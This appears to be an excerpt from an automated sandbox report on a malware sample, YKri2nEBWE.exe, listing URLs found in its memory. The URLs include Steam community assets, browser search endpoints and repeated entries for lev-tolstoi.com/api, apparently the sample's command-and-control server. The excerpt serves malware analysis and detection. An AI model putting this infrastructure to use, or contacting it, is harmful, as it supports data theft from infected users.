                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: YKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: YKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: YKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: YKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: YKri2nEBWE.exe, 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.=
                Source: YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly
                Source: YKri2nEBWE.exe, 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamb
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstat#
                Source: YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatiS
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.cc
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com
                Source: YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/g
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=E
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.000000000152B000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=s
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTR
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportec
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?C
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&am
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.j3
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatics
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.y
                Source: YKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: YKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: YKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: YKri2nEBWE.exe, 00000000.00000003.2287052008.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282630199.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366999109.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368272162.0000000001532000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368499776.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368621513.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283684889.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174849256.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283078885.00000000015CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/0
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/W
                Source: YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiB
                Source: YKri2nEBWE.exe, 00000000.00000002.2368272162.0000000001529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiS
                Source: YKri2nEBWE.exe, 00000000.00000002.2368577753.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apil
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174849256.0000000001571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apimC
                Source: YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366999109.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368621513.00000000015CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apis
                Source: YKri2nEBWE.exe, 00000000.00000002.2368577753.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apix
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366999109.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368621513.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174849256.0000000001571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: YKri2nEBWE.exe, 00000000.00000003.2366999109.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368621513.00000000015CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piNXxr&
                Source: YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/t
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174849256.0000000001571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/uo0
                Source: YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000155D000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283078885.00000000015CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001532000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.000000000152B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilte
